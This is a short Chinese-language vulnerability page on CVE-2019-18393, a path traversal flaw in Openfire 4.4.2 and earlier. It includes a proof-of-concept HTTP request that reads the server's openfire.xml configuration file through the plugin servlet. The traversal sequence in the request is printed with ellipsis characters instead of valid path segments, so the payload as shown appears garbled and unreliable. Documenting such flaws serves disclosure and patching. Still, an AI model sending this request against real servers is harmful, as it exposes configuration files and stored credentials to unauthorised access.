【初级】openfire 目录遍历

CVE-2019-18393

漏洞描述:Ignite Realtime Openfire是Ignite Realtime社区的一款采用Java开发且基于XMPP(前称Jabber,即时通讯协议)的跨平台开源实时协作(RTC)服务器,它能够构建高效率的即时通信服务器,并支持上万并发用户数量。

Ignite Realtime Openfire 4.4.2及之前版本中的PluginServlet.java文件存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。

影响版本:Ignite Realtime Openfire 4.4.2及之前版本

POC:

GET /plugins/search/……\conf\openfire.xml HTTP/1.1
Host: assesmenthost.com:9090
Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;

需要管理员权限才能攻击
参考资料:https://swarm.ptsecurity.com/openfire-admin-console/

© 版权声明
THE END
喜欢就支持一下吧
点赞10赏点小钱 分享